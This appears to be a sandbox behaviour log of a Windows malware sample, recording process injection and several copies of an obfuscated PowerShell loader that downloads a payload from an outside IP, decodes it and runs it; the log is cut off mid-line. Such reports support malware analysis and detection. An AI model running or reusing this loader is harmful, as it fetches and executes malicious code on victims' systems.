        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtTerminateThread: Direct from: 0x77A32EECJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6E6431BJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFB5E559E7F
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtNotifyChangeKey: Direct from: 0x77A33B4CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtMapViewOfSection: Direct from: 0x77A32C3CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtAllocateVirtualMemory: Direct from: 0x77A32B1CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtResumeThread: Direct from: 0x77A335CCJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtQuerySystemInformation: Direct from: 0x77A32D1CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtClose: Direct from: 0x77A32A8C
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtCreateKey: Direct from: 0x77A32B8CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtSetInformationThread: Direct from: 0x77A32A6CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtQueryAttributesFile: Direct from: 0x77A32D8CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtDelayExecution: Direct from: 0x77A32CFCJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtOpenKeyEx: Direct from: 0x77A32ABCJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtQueryInformationProcess: Direct from: 0x77A32B46Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFB92E02651Jump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtProtectVirtualMemory: Direct from: 0x77A32EBCJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtCreateFile: Direct from: 0x77A32F0CJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6E6414CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtQuerySystemInformation: Direct from: 0x77A347ECJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtDeviceIoControlFile: Direct from: 0x77A32A0CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtOpenSection: Direct from: 0x77A32D2CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtAllocateVirtualMemory: Direct from: 0x77A32B0CJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x6E64392Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread register set: target process: 7544Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeThread register set: target process: 7912Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3080000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 307FF98Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ruthenious = 1;$dirkningernes='Substrin';$dirkningernes+='g';Function Sonedkkets($Fumingly){$Programmeringsbegrebet=$Fumingly.Length-$Ruthenious;For($Ozonify=1; $Ozonify -lt $Programmeringsbegrebet; $Ozonify+=(2)){$Hjul+=$Fumingly.$dirkningernes.Invoke($Ozonify, $Ruthenious);}$Hjul;}function Innovative($Oryctognosy238){. ($Complexes) ($Oryctognosy238);}$Glasskaaret=Sonedkkets ' MHoKz.iBlFlEa /U5S. 0S A(IW.i nKdDo,w s, BN T ,1 0 .S0C;, KWIiUn 6T4F; .x,6,4S;, TrBv :T1I2B1S.C0E)H ,GEeAc kDo /b2O0 1 0A0 1 0 1F F.i rReTf orxL/.1 2.1O. 0 ';$Beshaming=Sonedkkets ' UCsHeUr -MA.g.e,n.tB ';$Bladfod=Sonedkkets ' hOt t pP:a/S/,8 7,.C1T2v1L. 1R0R5L. 1 6O3H/.L i,cPeUn c.eJsA.,t.trf ';$Gruppemedlemmernes=Sonedkkets 'S> ';$Complexes=Sonedkkets 'EiReAxB ';$Gambia = Sonedkkets ' e,cTh o B%Aa,pEpOdOa t,a.%S\ P,rWeSzSyCg,oVmMaIt.iLc,.AB.e n, u& & .eLcDhBo. $. ';Innovative (Sonedkkets 'B$CgSlSo bBaGl :.UUn wGa r.r,aAnCt a b.i lti tDy =D(UcAm,df /IcL A$ GOa.m b imaV) ');Innovative (Sonedkkets 'T$ g lFoDb a l.:MHKe e l.t a,p,2 6m= $BB,l a dIfSoUd .ssfp lCi t.(V$OGUr u p,p e mBe dSlAeCm m ePrhnKe s.) ');$Bladfod=$Heeltap26[0];Innovative (Sonedkkets ',$TgPl o bGaDlO:,RPr b l a,d eTs =MNTe w -AOSb,j eUc t AS.y sSt e.m .AN e t .RWFeMbtC l i eLn t, ');Innovative (Sonedkkets ' $ RArDb.lDa.d,eHs,..HGe.aSdCe.rLs [ $kB.ess.hKa mSiNnOgT]V=K$ GIlFaAsAsKk a.a r e t ');$Forvanskes=Sonedkkets ' RHrEbLlpaUdPeTsp.AD oTwSnPlmoOaSdSFCiCl e (s$.BMl.aDdPf oFdT,B$DHPoCo.pHoUe,s,), ';$Forvanskes=$Unwarrantability[1]+$Forvanskes;$Hoopoes=$Unwarrantability[0];Innovative (Sonedkkets ' $.gAlZoSb a lA:FGFrAa vRh j eN=D(MTTe,s t -SP a tFh $AHRo o.pAoRe sS)A ');while (!$Gravhje) {Innovative (Sonedkkets 'P$ gal o bTa lL: S t uKefa rPr e s.tmeFn s =S$PtRrTuBe. ') ;Innovative $Forvanskes;Innovative (Sonedkkets ',S.tTa rCtD-ISDl eWe pA ,4 ');Innovative (Sonedkkets 'B$Eg,lKo.b a,l :WGIrLa,v.hVj el=.( T ecsUtM-BPRa t h G$LHSoSoGpcoPeSs,)E ') ;Innovative (Sonedkkets ' $ gDl o b.aAlD:,S.u,pReNr fEiHnSi.c aBlO=S$ng,l.oFb.a.lM:RVDi tUh aMr,d.tFs,+ +A%.$,Hpe.e l tna p 2K6,..cSoBu nCt. ') ;$Bladfod=$Heeltap26[$Superfinical];}Innovative (Sonedkkets 'F$.gSlMo bAa l,:BGFu l i xG ,=E BG,eWt -PC oDnDt,eGnMt $UH oBoBp oPeTsU ');Innovative (Sonedkkets 'E$.gLlRolb.aOlt: T.hSo,r a cUo.sut rDaTc aan ,=. k[RS y s t e mP.JCUoPnCv eBr t ]M:B: FFrCoTm,B,aKsMeE6G4IS.tSrTiFn,g.(S$FG u lRimx.)U ');Innovative (Sonedkkets ',$Mg lVo b,a lK: G a r,dIe nTpBa rUt iQeBnNe, = ,[BS ySsDt eNm . TDe xUt .UEUnPc,oSd.ifnLgL]u:A: A S C,IPI,. G eHt S.t r,i n g ( $ TKhNoSr.a cVoIsotnr aSchaSn )U ');Innovative (Sonedkkets 'E$,gPlLo.b aMl.: FDd e,vBaSr e i n d.utsStSr i e nSsP= $pG a.r d,eCnLp aVr,t.i,eUn e . s,uRbUsSt r i.n gE( 2O9A8.8s7 2 ,S2.6 1S1N8E)e ');Innovative $Fdevareindustriens;"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Prezygomatic.Ben && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. ') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka 